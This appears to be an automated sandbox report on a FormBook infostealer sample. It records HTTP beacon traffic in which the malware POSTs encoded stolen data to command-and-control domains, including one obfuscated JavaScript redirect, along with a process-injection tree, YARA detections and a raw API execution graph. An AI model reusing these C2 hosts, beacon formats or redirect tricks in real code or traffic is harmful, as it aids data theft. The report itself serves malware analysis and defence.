                                                          Timestamp:Dec 3, 2024 23:29:27.207071066 CET
                                                          Bytes transferred:364
                                                          Direction:IN
                                                          Data:HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:29:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>UQa>yf.6PZ0


                                                          Session ID:26
                                                          Source IP:192.168.2.6
                                                          Source Port:50036
                                                          Destination IP:154.88.22.101
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:28.286525011 CET
                                                          Bytes transferred:772
                                                          Direction:OUT
                                                          Data:POST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxn+2i6C5HA8Y2379yWVbHvZZwdOetIlGDe42SXnIWYkKw==
                                                          Timestamp:Dec 3, 2024 23:29:29.834085941 CET
                                                          Bytes transferred:364
                                                          Direction:IN
                                                          Data:HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:29:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>UQa>yf.6PZ0


                                                          Session ID:27
                                                          Source IP:192.168.2.6
                                                          Source Port:50037
                                                          Destination IP:154.88.22.101
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:30.957195997 CET
                                                          Bytes transferred:1785
                                                          Direction:OUT
                                                          Data:POST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                          Session ID:28
                                                          Source IP:192.168.2.6
                                                          Source Port:50038
                                                          Destination IP:154.88.22.101
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:33.621771097 CET
                                                          Bytes transferred:502
                                                          Direction:OUT
                                                          Data:GET /jhb8/?b6=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Timestamp:Dec 3, 2024 23:29:35.274543047 CET
                                                          Bytes transferred:332
                                                          Direction:IN
                                                          Data:HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:29:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly8zZmViLnQ5MXhkMS5wcm86ODkxMQ=c=')</script>0


                                                          Session ID:29
                                                          Source IP:192.168.2.6
                                                          Source Port:50039
                                                          Destination IP:209.74.77.107
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:41.043953896 CET
                                                          Bytes transferred:766
                                                          Direction:OUT
                                                          Data:POST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3SLE1TVpyeC+5S/yigZkktqt9xxiVHmaY2fpQhvGFcV5
                                                          Timestamp:Dec 3, 2024 23:29:42.352122068 CET
                                                          Bytes transferred:533
                                                          Direction:IN
                                                          Data:HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:42 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID:30
                                                          Source IP:192.168.2.6
                                                          Source Port:50040
                                                          Destination IP:209.74.77.107
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:43.703735113 CET
                                                          Bytes transferred:790
                                                          Direction:OUT
                                                          Data:POST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29Kv9zpQVnmwa2npC2jhKowarfk7WXWLVu2+iFdwp7kMBw==
                                                          Timestamp:Dec 3, 2024 23:29:45.015003920 CET
                                                          Bytes transferred:533
                                                          Direction:IN
                                                          Data:HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:44 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID:31
                                                          Source IP:192.168.2.6
                                                          Source Port:50041
                                                          Destination IP:209.74.77.107
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:46.521192074 CET
                                                          Bytes transferred:1803
                                                          Direction:OUT
                                                          Data:POST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Timestamp:Dec 3, 2024 23:29:47.916810036 CET
                                                          Bytes transferred:533
                                                          Direction:IN
                                                          Data:HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:47 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID:32
                                                          Source IP:192.168.2.6
                                                          Source Port:50042
                                                          Destination IP:209.74.77.107
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:49.187618017 CET
                                                          Bytes transferred:508
                                                          Direction:OUT
                                                          Data:GET /alu5/?b6=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Timestamp:Dec 3, 2024 23:29:50.450774908 CET
                                                          Bytes transferred:548
                                                          Direction:IN
                                                          Data:HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:50 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>



                                                          Target ID:0
                                                          Start time:17:26:51
                                                          Start date:03/12/2024
                                                          Path:C:\Users\user\Desktop\Latest advice payment.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Latest advice payment.exe"
                                                          Imagebase:0x560000
                                                          File size:1'216'000 bytes
                                                          MD5 hash:B1FF44D20BC312E62D55DAF8A8CF5B07
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:17:26:52
                                                          Start date:03/12/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Latest advice payment.exe"
                                                          Imagebase:0xcc0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:17:27:12
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe"
                                                          Imagebase:0x650000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:17:27:15
                                                          Start date:03/12/2024
                                                          Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                          Imagebase:0xc20000
                                                          File size:186'880 bytes
                                                          MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:12
                                                          Start time:17:27:28
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe"
                                                          Imagebase:0x650000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:14
                                                          Start time:17:27:41
                                                          Start date:03/12/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:3.6%
                                                            Dynamic/Decrypted Code Coverage:1.5%
                                                            Signature Coverage:10.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:158
                                                            execution_graph 100683 561066 100688 56f76f 100683->100688 100685 56106c 100721 582d40 100685->100721 100689 56f790 100688->100689 100724 57ff03 100689->100724 100693 56f7d7 100734 567667 100693->100734 100696 567667 59 API calls 100697 56f7eb 100696->100697 100698 567667 59 API calls 100697->100698 100699 56f7f5 100698->100699 100700 567667 59 API calls 100699->100700 100701 56f833 100700->100701 100702 567667 59 API calls 100701->100702 100703 56f8fe 100702->100703 100739 575f87 100703->100739 100707 56f930 100708 567667 59 API calls 100707->100708 100709 56f93a 100708->100709 100767 57fd9e 100709->100767 100711 56f981 100712 56f991 GetStdHandle 100711->100712 100713 5a45ab 100712->100713 100714 56f9dd 100712->100714 100713->100714 100716 5a45b4 100713->100716 100715 56f9e5 OleInitialize 100714->100715 100715->100685 100774 5c6b38 64 API calls Mailbox 100716->100774 100718 5a45bb 100775 5c7207 CreateThread 100718->100775 100720 5a45c7 CloseHandle 100720->100715 100847 582c44 100721->100847 100723 561076 100776 57ffdc 100724->100776 100727 57ffdc 59 API calls 100728 57ff45 100727->100728 100729 567667 59 API calls 100728->100729 100730 57ff51 100729->100730 100783 567bcc 100730->100783 100732 56f796 100733 580162 6 API calls 100732->100733 100733->100693 100735 580db6 Mailbox 59 API calls 100734->100735 100736 567688 100735->100736 100737 580db6 Mailbox 59 API calls 100736->100737 100738 567696 100737->100738 100738->100696 100740 567667 59 API calls 100739->100740 100741 575f97 100740->100741 100742 567667 59 API calls 100741->100742 100743 575f9f 100742->100743 100842 575a9d 100743->100842 100746 575a9d 59 API calls 100747 575faf 100746->100747 100748 567667 59 API calls 100747->100748 100749 575fba 100748->100749 100750 580db6 Mailbox 59 API calls 100749->100750 100751 56f908 100750->100751 100752 5760f9 100751->100752 100753 576107 100752->100753 100754 567667 59 API calls 100753->100754 100755 576112 
100754->100755 100756 567667 59 API calls 100755->100756 100757 57611d 100756->100757 100758 567667 59 API calls 100757->100758 100759 576128 100758->100759 100760 567667 59 API calls 100759->100760 100761 576133 100760->100761 100762 575a9d 59 API calls 100761->100762 100763 57613e 100762->100763 100764 580db6 Mailbox 59 API calls 100763->100764 100765 576145 RegisterWindowMessageW 100764->100765 100765->100707 100768 5b576f 100767->100768 100769 57fdae 100767->100769 100845 5c9ae7 60 API calls 100768->100845 100770 580db6 Mailbox 59 API calls 100769->100770 100772 57fdb6 100770->100772 100772->100711 100773 5b577a 100774->100718 100775->100720 100846 5c71ed 65 API calls 100775->100846 100777 567667 59 API calls 100776->100777 100778 57ffe7 100777->100778 100779 567667 59 API calls 100778->100779 100780 57ffef 100779->100780 100781 567667 59 API calls 100780->100781 100782 57ff3b 100781->100782 100782->100727 100784 567c45 100783->100784 100785 567bd8 __NMSG_WRITE 100783->100785 100796 567d2c 100784->100796 100787 567c13 100785->100787 100788 567bee 100785->100788 100793 568029 100787->100793 100792 567f27 59 API calls Mailbox 100788->100792 100791 567bf6 _memmove 100791->100732 100792->100791 100800 580db6 100793->100800 100795 568033 100795->100791 100797 567d3a 100796->100797 100799 567d43 _memmove 100796->100799 100797->100799 100838 567e4f 100797->100838 100799->100791 100803 580dbe 100800->100803 100802 580dd8 100802->100795 100803->100802 100805 580ddc std::exception::exception 100803->100805 100810 58571c 100803->100810 100827 5833a1 DecodePointer 100803->100827 100828 58859b RaiseException 100805->100828 100807 580e06 100829 5884d1 58 API calls _free 100807->100829 100809 580e18 100809->100795 100811 585797 100810->100811 100814 585728 100810->100814 100836 5833a1 DecodePointer 100811->100836 100813 58579d 100837 588b28 58 API calls __getptd_noexit 100813->100837 100817 58575b RtlAllocateHeap 100814->100817 100819 585733 100814->100819 100821 585783 
100814->100821 100825 585781 100814->100825 100833 5833a1 DecodePointer 100814->100833 100817->100814 100818 58578f 100817->100818 100818->100803 100819->100814 100830 58a16b 58 API calls __NMSG_WRITE 100819->100830 100831 58a1c8 58 API calls 6 library calls 100819->100831 100832 58309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100819->100832 100834 588b28 58 API calls __getptd_noexit 100821->100834 100835 588b28 58 API calls __getptd_noexit 100825->100835 100827->100803 100828->100807 100829->100809 100830->100819 100831->100819 100833->100814 100834->100825 100835->100818 100836->100813 100837->100818 100839 567e62 100838->100839 100841 567e5f _memmove 100838->100841 100840 580db6 Mailbox 59 API calls 100839->100840 100840->100841 100841->100799 100843 567667 59 API calls 100842->100843 100844 575aa5 100843->100844 100844->100746 100845->100773 100848 582c50 _fprintf 100847->100848 100855 583217 100848->100855 100854 582c77 _fprintf 100854->100723 100872 589c0b 100855->100872 100857 582c59 100858 582c88 DecodePointer DecodePointer 100857->100858 100859 582cb5 100858->100859 100860 582c65 100858->100860 100859->100860 100918 5887a4 59 API calls __filbuf 100859->100918 100869 582c82 100860->100869 100862 582d18 EncodePointer EncodePointer 100862->100860 100863 582cec 100863->100860 100867 582d06 EncodePointer 100863->100867 100920 588864 61 API calls 2 library calls 100863->100920 100864 582cc7 100864->100862 100864->100863 100919 588864 61 API calls 2 library calls 100864->100919 100867->100862 100868 582d00 100868->100860 100868->100867 100921 583220 100869->100921 100873 589c1c 100872->100873 100874 589c2f EnterCriticalSection 100872->100874 100879 589c93 100873->100879 100874->100857 100876 589c22 100876->100874 100903 5830b5 58 API calls 3 library calls 100876->100903 100880 589c9f _fprintf 100879->100880 100881 589ca8 100880->100881 100882 589cc0 100880->100882 100904 58a16b 58 API calls __NMSG_WRITE 100881->100904 100894 589ce1 
_fprintf 100882->100894 100907 58881d 58 API calls 2 library calls 100882->100907 100885 589cad 100905 58a1c8 58 API calls 6 library calls 100885->100905 100886 589cd5 100888 589ceb 100886->100888 100889 589cdc 100886->100889 100892 589c0b __lock 58 API calls 100888->100892 100908 588b28 58 API calls __getptd_noexit 100889->100908 100890 589cb4 100906 58309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100890->100906 100895 589cf2 100892->100895 100894->100876 100897 589cff 100895->100897 100898 589d17 100895->100898 100909 589e2b InitializeCriticalSectionAndSpinCount 100897->100909 100910 582d55 100898->100910 100901 589d0b 100916 589d33 LeaveCriticalSection _doexit 100901->100916 100904->100885 100905->100890 100907->100886 100908->100894 100909->100901 100911 582d87 __dosmaperr 100910->100911 100912 582d5e RtlFreeHeap 100910->100912 100911->100901 100912->100911 100913 582d73 100912->100913 100917 588b28 58 API calls __getptd_noexit 100913->100917 100915 582d79 GetLastError 100915->100911 100916->100894 100917->100915 100918->100864 100919->100863 100920->100868 100924 589d75 LeaveCriticalSection 100921->100924 100923 582c87 100923->100854 100924->100923 100925 561016 100930 564974 100925->100930 100928 582d40 __cinit 67 API calls 100929 561025 100928->100929 100931 580db6 Mailbox 59 API calls 100930->100931 100932 56497c 100931->100932 100933 56101b 100932->100933 100937 564936 100932->100937 100933->100928 100938 564951 100937->100938 100939 56493f 100937->100939 100941 5649a0 100938->100941 100940 582d40 __cinit 67 API calls 100939->100940 100940->100938 100942 567667 59 API calls 100941->100942 100943 5649b8 GetVersionExW 100942->100943 100944 567bcc 59 API calls 100943->100944 100945 5649fb 100944->100945 100946 567d2c 59 API calls 100945->100946 100949 564a28 100945->100949 100947 564a1c 100946->100947 100969 567726 100947->100969 100950 564a93 GetCurrentProcess IsWow64Process 100949->100950 100951 59d864 100949->100951 100952 564aac 
100950->100952 100953 564ac2 100952->100953 100954 564b2b GetSystemInfo 100952->100954 100965 564b37 100953->100965 100955 564af8 100954->100955 100955->100933 100958 564ad4 100961 564b37 2 API calls 100958->100961 100959 564b1f GetSystemInfo 100960 564ae9 100959->100960 100960->100955 100962 564aef FreeLibrary 100960->100962 100963 564adc GetNativeSystemInfo 100961->100963 100962->100955 100963->100960 100966 564ad0 100965->100966 100967 564b40 LoadLibraryA 100965->100967 100966->100958 100966->100959 100967->100966 100968 564b51 GetProcAddress 100967->100968 100968->100966 100970 567734 100969->100970 100971 567d2c 59 API calls 100970->100971 100972 567744 100971->100972 100972->100949 100973 10a4cdb 100974 10a4ce2 100973->100974 100975 10a4cea 100974->100975 100976 10a4d80 100974->100976 100980 10a4990 100975->100980 100993 10a5630 9 API calls 100976->100993 100979 10a4d67 100994 10a2380 100980->100994 100983 10a4a60 CreateFileW 100985 10a4a6d 100983->100985 100990 10a4a2f 100983->100990 100984 10a4a89 VirtualAlloc 100984->100985 100986 10a4aaa ReadFile 100984->100986 100987 10a4c8a 100985->100987 100988 10a4c7c VirtualFree 100985->100988 100986->100985 100989 10a4ac8 VirtualAlloc 100986->100989 100987->100979 100988->100987 100989->100985 100989->100990 100990->100984 100990->100985 100991 10a4b90 CloseHandle 100990->100991 100992 10a4ba0 VirtualFree 100990->100992 100997 10a58a0 GetPEB 100990->100997 100991->100990 100992->100990 100993->100979 100999 10a5840 GetPEB 100994->100999 100996 10a2a0b 100996->100990 100998 10a58ca 100997->100998 100998->100983 101000 10a586a 100999->101000 101000->100996 101001 561055 101006 562649 101001->101006 101004 582d40 __cinit 67 API calls 101005 561064 101004->101005 101007 567667 59 API calls 101006->101007 101008 5626b7 101007->101008 101013 563582 101008->101013 101010 562754 101012 56105a 101010->101012 101016 563416 59 API calls 2 library calls 101010->101016 101012->101004 101017 5635b0 101013->101017 101016->101010 
101018 5635a1 101017->101018 101019 5635bd 101017->101019 101018->101010 101019->101018 101020 5635c4 RegOpenKeyExW 101019->101020 101020->101018 101021 5635de RegQueryValueExW 101020->101021 101022 563614 RegCloseKey 101021->101022 101023 5635ff 101021->101023 101022->101018 101023->101022 101024 563633 101025 56366a 101024->101025 101026 5636e7 101025->101026 101027 563688 101025->101027 101064 5636e5 101025->101064 101029 59d0cc 101026->101029 101030 5636ed 101026->101030 101031 563695 101027->101031 101032 56374b PostQuitMessage 101027->101032 101028 5636ca DefWindowProcW 101066 5636d8 101028->101066 101073 571070 10 API calls Mailbox 101029->101073 101033 563715 SetTimer RegisterWindowMessageW 101030->101033 101034 5636f2 101030->101034 101036 5636a0 101031->101036 101037 59d154 101031->101037 101032->101066 101041 56373e CreatePopupMenu 101033->101041 101033->101066 101038 59d06f 101034->101038 101039 5636f9 KillTimer 101034->101039 101042 563755 101036->101042 101043 5636a8 101036->101043 101089 5c2527 71 API calls _memset 101037->101089 101047 59d0a8 MoveWindow 101038->101047 101048 59d074 101038->101048 101069 56443a Shell_NotifyIconW _memset 101039->101069 101040 59d0f3 101074 571093 331 API calls Mailbox 101040->101074 101041->101066 101071 5644a0 64 API calls _memset 101042->101071 101051 59d139 101043->101051 101052 5636b3 101043->101052 101045 59d166 101045->101028 101045->101066 101047->101066 101056 59d078 101048->101056 101057 59d097 SetFocus 101048->101057 101051->101028 101088 5b7c36 59 API calls Mailbox 101051->101088 101053 5636be 101052->101053 101054 59d124 101052->101054 101053->101028 101075 56443a Shell_NotifyIconW _memset 101053->101075 101087 5c2d36 81 API calls _memset 101054->101087 